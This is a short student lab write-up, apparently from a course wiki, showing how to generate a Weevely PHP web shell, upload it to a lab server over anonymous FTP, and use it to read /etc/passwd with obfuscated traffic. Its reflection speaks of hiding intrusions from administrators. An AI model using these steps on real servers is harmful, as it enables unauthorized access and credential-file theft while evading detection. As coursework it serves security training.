Weevely Lab 8.1 - DefiantCoder/Tech-Journals GitHub Wiki
-
weevely generate _YourPassword _~/_DirectoryLocation_/_FileName_.php
This makes your weevely php file that will be used to grab passwd in this case -
use
ftp -i 10.0.5.25
to enter pippin, the credentials wereanonymous
and there was no password -
The next step was to use
cd upload
to enter the upload directory where you useput _filename_.php
to put your weevely .php file intohttp://10.0.5.25/upload
-
finally you can use
weevely http://10.0.5.25/upload/_FileName_.php _YourPassword_
to enter your weevely session and executecat /etc/passwd
and have an obfuscated output in wireshark
Reflection:
This was an interesting lab where we learned a new tool which can help us keep certain actions private or potentially undetected. I am curious to see how detection software may interact with this program, both with weevely itself and hiding intrusions from Administrators.